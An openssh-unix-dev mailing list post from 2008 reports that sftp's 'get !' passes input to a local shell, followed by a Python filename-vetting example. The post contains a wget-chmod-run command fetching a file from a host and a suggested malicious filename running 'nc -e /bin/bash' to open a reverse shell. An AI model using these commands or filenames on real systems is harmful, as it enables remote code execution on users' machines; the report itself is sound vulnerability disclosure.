Strange sftp input parameter handling, user assisted code execution?
Roman Fiedler
roman.fiedler at telbiomed.at
Wed Jun 18 01:12:14 EST 2008
Hello list,
I use openssh-client 1:4.7p1-8ubuntu1.2. After authentication:
sftp> get !xxxx
/bin/bash: xxxx: command not found
Shell exited with status 127
sftp> get !/bin/ls -al
total 2132
drwxr-xr-x 4 admin users 4096 2008-06-17 16:33 .
drwxr-xr-x 16 admin users 12288 2008-06-17 08:50 ..
drwxr-xr-x 3 admin users 8 2008-05-21 18:38 gd
sftp> get !wget http://10.255.255.2:1234/root ; chmod 0755 root ; ./root
--16:54:37-- http://10.255.255.2:1234/root
=> `root'
Connecting to 10.255.255.2:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 123
100%[====================================>] 123 13.59B/s
ETA 00:00
16:55:49 (7.08 B/s) - `root' saved [123/123]
./root: line 1: afdasfasf: command not found
./root: line 3: asdfa: command not found
Shell exited with status 127
sftp>
On a Linux server I did not manage to create a file with a / in the
name, but a manipulated server could return such filenames or other
strategies do not need them, e.g.
touch '!nc -e /bin/bash 10.255.255.2 1234' on the server side and trying
to download is also a good one.
Has someone observed this behavior?
Is this just a strange thing but according to the specs or a bug?
lg roman
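
An added example, not part of the original post and not OpenSSH code: a client-side check that vets the names a server returns before any of them is used as an argument to an sftp command, refusing the leading "!" form shown in the session above and names containing "/". The function names and the sample listing are constructed for illustration, and the control-character rule goes beyond the cases in the post.

```python
import unicodedata

# Prefix that reached the local shell in the session quoted in the post.
SHELL_ESCAPE = "!"


def vet_remote_name(name):
    """Return the reasons to refuse `name`; an empty list means accept."""
    reasons = []
    if not name:
        reasons.append("empty name")
    # Leading whitespace is ignored so padding cannot hide the prefix.
    if name.lstrip().startswith(SHELL_ESCAPE):
        reasons.append("leading '!' (local shell escape)")
    # A directory entry must be one path component; the post notes that a
    # manipulated server could return names containing '/'.
    if "/" in name or name in (".", ".."):
        reasons.append("not a single path component")
    # Generalization beyond the post: a newline or other control character
    # could split a line if the name is later written into a batch file.
    if any(unicodedata.category(ch) == "Cc" for ch in name):
        reasons.append("control character")
    return reasons


def split_listing(names):
    """Partition a remote listing into accepted names and refused ones."""
    accepted, refused = [], {}
    for name in names:
        reasons = vet_remote_name(name)
        if reasons:
            refused[name] = reasons
        else:
            accepted.append(name)
    return accepted, refused


# Constructed listing; the two '!' names reuse strings typed in the post.
SAMPLE_LISTING = ["report.txt", "gd", "!xxxx", "!/bin/ls -al", "  !xxxx",
                  "notes\nget other", "../gd", "wait!what.txt"]

if __name__ == "__main__":
    ok, bad = split_listing(SAMPLE_LISTING)
    print("accepted:", ok)
    for name, why in bad.items():
        print("refused: %r -> %s" % (name, "; ".join(why)))
```

A name with "!" in the middle is accepted because only the leading form appears in the post; refused names should be logged and skipped rather than rewritten.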
More information about the openssh-unix-dev mailing list